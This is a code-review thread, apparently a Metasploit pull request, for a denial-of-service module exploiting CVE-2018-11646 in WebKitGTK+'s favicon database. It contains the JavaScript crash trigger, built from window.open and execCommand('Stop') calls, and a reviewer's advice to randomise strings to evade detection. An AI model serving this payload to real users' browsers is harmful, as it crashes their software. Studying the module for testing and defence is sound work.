WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646 #10156
def setup | ||
@html = <<-JS | ||
<script type="text/javascript"> | ||
win = window.open("sleep_one_second.php", "WIN"); |
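Review bot: `sleep_one_second.php` is a relative path, so the victim browser will request it from this module's own HttpServer; since the first `window.open` only needs to create a named window (`WIN`) and the path itself is arbitrary, a short comment saying so would answer the obvious question. Consider `<<~JS` instead of `<<-JS` so the heredoc body is not served with its Ruby indentation.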
What is sleep_one_second.php?
What I observed is that it can be anything, for example hello_world.php or WIN.
@html = <<-JS | ||
<script type="text/javascript"> | ||
win = window.open("sleep_one_second.php", "WIN"); | ||
window.open("https://www.paypal.com", "WIN"); |
Can this be randomised? Does it need to be a real URL? If so, it should be configurable.
Alternatively, can the URL point back to the MSF HTTP server?
The URL is not necessary though; it can be configurable, or we can simply change it to WIN.
win = window.open("sleep_one_second.php", "WIN"); | ||
window.open("https://www.paypal.com", "WIN"); | ||
win.document.execCommand('Stop'); | ||
win.document.write("Spoofed URL"); |
Is this necessary? If so, is win.document.write(''); sufficient?
Not sure about this, but it looks sufficient, specifically to trigger the crash in WebKitGTK+.
super( | ||
update_info( | ||
info, | ||
'Name' => "WebKitGTK+ leading to an application crash [DoS]", |
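Review bot: `'Name' => "WebKitGTK+ leading to an application crash [DoS]"` uses double quotes with no interpolation; Metasploit's Rubocop configuration prefers single quotes for such literals, so write `'Name' => 'WebKitGTK+ leading to an application crash [DoS]'` (or whatever shorter name is settled on).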
Perhaps: WebKitGTK+ WebKitFaviconDatabase DoS
'Manuel Caballero' #JS Code | ||
], | ||
'References' => [ | ||
['EXPLOIT-DB', '44842'], |
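Review bot: the inline comment `'Manuel Caballero' #JS Code` needs a space after `#` (`# JS Code`) to satisfy Rubocop's leading-comment-space rule, and `'EXPLOIT-DB'` is not a reference type Metasploit resolves; use `['EDB', '44842']` so the reference renders as a link.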
EDB
['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'], | ||
['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html'] | ||
], | ||
'DisclosureDate' => 'June 03 2018', |
'Jun 3 2018'
Thanks bcoles 😎
Great stuff @RootUp
Thanks @timwr
@@ -0,0 +1,96 @@ | |||
## Vulnerable Application | |||
|
|||
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. |
This module exploits a vulnerability in `WebKitFaviconDatabase` when `pageURL` is unset.
If successful, it could lead to application crash, resulting in denial of service.
The `webkitFaviconDatabaseSetIconForPageURL` and `webkitFaviconDatabaseSetIconURLForPageURL`
functions in `UIProcess/API/glib/WebKitFaviconDatabase.cpp` in WebKit, as used in WebKitGTK+
through 2.21.3, mishandle an unset `pageURL`, leading to an application crash.
|
||
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. | ||
|
||
Related links : |
Related links :
* https://bugs.webkit.org/show_bug.cgi?id=186164
* https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html
'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS", | ||
'Description' => %q( | ||
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. | ||
If successful,it could leads to application crash, denial of service. |
If successful, it could lead to application crash, resulting in denial of service.
win=window.open("sleep_one_second.php", "WIN"); | ||
window.open("https://www.paypal.com", "WIN"); | ||
win.document.execCommand('Stop'); | ||
win.document.write("Spoofed URL"); |
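Review bot: `win=window.open(...)` lacks spaces around `=` while the line below has them; align the two. The JavaScript also mixes `'Stop'` with `"Spoofed URL"`; pick one quote style for the script.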
Hardcoded strings like Spoofed URL and sleep_one_second.php make the code easier to detect and prevent. They also increase the chances of the user realising something suspicious is afoot, in the event they're using a non-vulnerable browser that doesn't crash. These should be randomized where possible.
Similarly, PayPal probably aren't keen on being used as the default URL (free advertising?). The URL should point elsewhere if possible.
Suggestions made by bcoles
Thanks @bcoles 😎
Minor changes
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::HttpServer | ||
|
This also needs to include Msf::Auxiliary::Dos to avoid being unintentionally run by Pro and other tools.
WFM, thanks @RootUp!
Release Notes
This adds a DoS module for CVE-2018-11646, exploiting a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it can cause a crash in applications using a vulnerable version of WebKitGTK+ up to version 2.21.3.
Summary
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to an application crash (denial of service). webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Tested on:
Epiphany Web Browser 3.28.x
Verification
Backtrace using Fedora 27
References:
https://bugs.webkit.org/show_bug.cgi?id=186164
https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html